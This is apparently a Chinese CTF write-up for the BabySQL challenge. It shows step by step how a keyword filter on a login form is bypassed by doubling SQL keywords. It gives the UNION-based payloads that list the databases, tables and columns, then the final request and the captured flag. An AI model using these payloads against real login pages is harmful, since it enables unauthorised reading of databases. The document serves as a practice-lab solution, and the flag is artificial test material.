极客大挑战 2019BabySQL(手动sql注入)

[极客大挑战 2019]BabySQL,熟悉的界面,这个题的第三次变体了吧

[极客大挑战 2019]BabySQL(手动sql注入)

  • [极客大挑战 2019]BabySQL,熟悉的界面,这个题的第三次变体了吧

    • 极客大挑战 2019BabySQL(手动sql注入)_第1张图片
  • 试一下万能密码

  • 本来打算直接抓包的,看到一位师傅,直接给双写绕过了,试了试果然有用(还把+给过滤了1=1–+用不了了)

  • 接下来和原来的操作基本一样,继续手动注入【别忘了双写绕过!】

  • 按照2019lovesql那个的完全一样,再试一遍

  • 用order by或者union select确定字段数和回显位置

    • 极客大挑战 2019BabySQL(手动sql注入)_第2张图片
  • 当前连接的数据库?username=admin&password=pwd%20%27 ununionion seselectlect 1,2,database() %23

    • 极客大挑战 2019BabySQL(手动sql注入)_第3张图片
  • 查询所有的数据库

  • ?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23

    • 极客大挑战 2019BabySQL(手动sql注入)_第4张图片
  • 查表?username=admin&password=pwd %27 ununionion seselectlect 1,2,

  • group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere table_schema=“ctf” %23只有一个flag表

    • 极客大挑战 2019BabySQL(手动sql注入)_第5张图片
  • 查字段名?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name=“Flag”%23只有一个flag字段

    • 极客大挑战 2019BabySQL(手动sql注入)_第6张图片
  • http://f3cee328-d0b2-4752-8cc0-7ed2f6a341f2.node3.buuoj.cn/check.php?username=admin&password=pwd%20%27%20ununionion%20seselectlect%201,2,group_concat(flag)frfromom(ctf.Flag)%23 * 极客大挑战 2019BabySQL(手动sql注入)_第7张图片

  • flag{f17dfb1a-8399-47b5-90fb-765faeab1fdc}

你可能感兴趣的:(ctfWP,unctf,安全,sql)